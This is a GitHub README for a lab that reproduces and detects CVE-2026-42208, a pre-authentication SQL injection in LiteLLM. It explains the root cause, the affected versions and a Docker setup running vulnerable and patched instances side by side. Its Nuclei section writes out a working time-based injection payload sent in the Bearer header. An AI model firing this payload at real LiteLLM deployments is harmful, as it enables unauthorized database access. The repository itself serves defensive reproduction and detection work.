HAERIN-L/poc_cve-2026-42208

GitHub: HAERIN-L/poc_cve-2026-42208

Stars: 0 | Forks: 0

# CVE-2026-42208 — LiteLLM Pre-Authentication SQL Injection A lab environment for reproducing and detecting **CVE-2026-42208**, a critical pre-authentication SQL injection vulnerability in LiteLLM where unsanitized Bearer tokens reach a raw PostgreSQL query. ## Vulnerability Overview | Field | Details | |-------|---------| | CVE ID | CVE-2026-42208 | | GHSA | [GHSA-r75f-5x8p-qvmc](https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc) | | CVSS | 9.3 (Critical) — `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` | | Affected versions | >= 1.81.16, < 1.83.7 | | Patched | v1.83.7 (parameterized query) | | CWE | CWE-89 (SQL Injection) | ### Root Cause Vulnerable (v1.83.6): POST /v1/chat/completions Authorization: Bearer ← payload does NOT start with "sk-" → api_key.startswith("sk-") assertion fails (utils.py:1189) → caught by except Exception (utils.py:1560) → _handle_authentication_error(api_key=RAW_PAYLOAD) → _enrich_failure_metadata_with_key_info() → get_data(token=RAW_PAYLOAD, table_name="combined_view") → SQL: WHERE v.token = '{payload}' ← injection Patched (v1.83.7): Same request path, but: → get_data(token=hashed_token, ...) → SQL: WHERE v.token = $1 ← parameterized, no injection ### Attack Prerequisites | # | Condition | Details | |---|-----------|---------| | 1 | Affected LiteLLM version | >= 1.81.16, < 1.83.7 | | 2 | PostgreSQL backend | SQLite deployments are unaffected | | 3 | No authentication required | Pre-auth; zero credentials needed | | 4 | ≥1 row in VerificationToken | pg_sleep only fires per row; empty table = no delay | ## Lab Architecture Host Machine ├── localhost:8010 ──→ Docker: litellm-vuln (v1.83.6-nightly ⚠ VULNERABLE) │ Docker: litellm-db-vuln (PostgreSQL 15) └── localhost:8011 ──→ Docker: litellm-patched (v1.83.7-stable ✓ PATCHED) Docker: litellm-db-patched (PostgreSQL 15) ## Prerequisites | Tool | Install | |------|---------| | [Docker Desktop](https://www.docker.com/) | docker.com | | [nuclei](https://github.com/projectdiscovery/nuclei) | `brew install nuclei` | | curl, python3 | pre-installed on macOS | ## How to Run ### Step 1 — Set up lab environment bash scripts/01-setup.sh When done: ══════════════════════════════════════════════════════ Lab ready! Vulnerable (v1.83.6-nightly) : http://localhost:8010 Patched (v1.83.7-stable) : http://localhost:8011 Master Key : sk-lab-master-key Next: bash scripts/02-exploit.sh ══════════════════════════════════════════════════════ ### Step 2 — Trigger the CVE bash scripts/02-exploit.sh **Expected output — vulnerable (v1.83.6-nightly):** ── Vulnerable (v1.83.6-nightly, port 8010) ── Baseline : 0.031s Injection : 6.062s (HTTP 401) Delta : +6.031s ⚠ RESULT: pg_sleep fired — SQL INJECTION CONFIRMED (VULNERABLE) **Expected output — patched (v1.83.7-stable):** ── Patched (v1.83.7-stable, port 8011) ── Baseline : 0.028s Injection : 0.029s (HTTP 401) Delta : +0.001s ✓ RESULT: No significant delay — injection not executed (PATCHED) ### Step 3 — Nuclei detection # Vulnerable instance → should produce a [critical] finding nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8010 # Patched instance → should produce no findings nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8011 **Vulnerable (v1.83.6-nightly):** ![Nuclei detection — vulnerable](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/b8babf1584180234.png) **Patched (v1.83.7-stable):** ![Nuclei detection — patched](https://static.pigsec.cn/wp-content/uploads/repos/2026/06/03db358965180241.png) ### Step 4 — Teardown bash scripts/99-teardown.sh ## Directory Structure litellm-cve-2026-42208/ ├── README.md ├── VULNERABILITY_ANALYSIS.md # Code-level analysis (English) ├── LAB_SETUP_GUIDE.md # Lab setup guide (English) ├── NUCLEI_TEMPLATE_GUIDE.md # Nuclei template design (English) ├── docker-compose.yaml │ ├── REPORT/ # Korean reports │ ├── Vulnerability_Analysis_KR.md │ ├── LAB_REPORT_KR.md │ └── Nuclei_Template_Report_KR.md │ ├── nuclei/ │ └── CVE-2026-42208.yaml # Nuclei detection template │ └── scripts/ ├── 01-setup.sh # Start containers, create seed key ├── 02-exploit.sh # PoC: timing-based injection proof └── 99-teardown.sh # Stop and remove all lab resources ## Nuclei Template Detection Logic Step 1 GET /health/liveliness → match "I am alive" in body → confirms target is a LiteLLM instance Step 2 POST /v1/chat/completions Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NOT NULL -- Matchers (AND — all must pass): status == 401 eliminates 504/502 false positives body contains "auth_error" OR "Authentication Error" confirms LiteLLM auth path, not a proxy duration >= 5 pg_sleep(6) fired → injection confirmed False positive prevention: - `status == 401` eliminates responses from upstream timeouts (504) and gateway errors (502) - Body keyword match confirms the 401 came from LiteLLM's auth handling, not a WAF or proxy - `duration >= 5` is sufficiently high to exclude network jitter (baseline is ≤0.5s) ## References - [GHSA-r75f-5x8p-qvmc](https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc) - [NVD — CVE-2026-42208](https://nvd.nist.gov/vuln/detail/CVE-2026-42208) - [Sysdig Analysis](https://www.sysdig.com/blog/cve-2026-42208-critical-sql-injection-litellm/)